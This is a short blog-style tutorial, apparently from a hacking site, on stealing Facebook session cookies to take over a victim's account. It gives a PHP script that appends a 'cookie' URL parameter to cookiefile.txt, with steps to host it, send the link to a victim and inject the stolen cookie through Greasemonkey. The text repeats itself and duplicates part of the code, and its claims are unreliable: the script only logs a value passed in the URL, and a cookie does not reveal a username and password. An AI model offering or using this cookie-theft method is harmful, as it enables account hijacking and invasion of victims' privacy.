Hy friends i am telling a new and
safe way to hack a facebook
account just in a click. The tutorial i will
show u today is Cookie Stealing using a
php script and then use this cookie to
get the username and password.So
lets start:--->
1. create a new text file and type this
code
2. Save it as index.php
3. Now upload this to any free web
hosting site .
4. After uploading this file make sure u
have set the file permission to 777
5. Now u will get the url as
www.yoursite.com/index.php
6. Now send this url to ur victim and
when victim clicks on this link his cookie
will be stored in a text file named as
cookiefile.txt
7. Use Mozilla browser,greasmonkey
and cookie injector script to inject
cookie into fb and then you have
the access to victim account.
safe way to hack a facebook
account just in a click. The tutorial i will
show u today is Cookie Stealing using a
php script and then use this cookie to
get the username and password.So
lets start:--->
1. create a new text file and type this
code
<?php
$cookie = $HTTP_GET_VARS["cookie"];
$steal = fopen("cookiefile.txt", "a");
fwrite($steal, $cookie ."n");
fclose($steal);
?>
$cookie = $HTTP_GET_VARS["cookie"];
$steal = fopen("cookiefile.txt", "a");
fwrite($steal, $cookie ."n");
fclose($steal);
?>
2. Save it as index.php
3. Now upload this to any free web
hosting site .
4. After uploading this file make sure u
have set the file permission to 777
5. Now u will get the url as
www.yoursite.com/index.php
6. Now send this url to ur victim and
when victim clicks on this link his cookie
will be stored in a text file named as
cookiefile.txt
7. Use Mozilla browser,greasmonkey
and cookie injector script to inject
cookie into fb and then you have
the access to victim account.
0 comments:
Post a Comment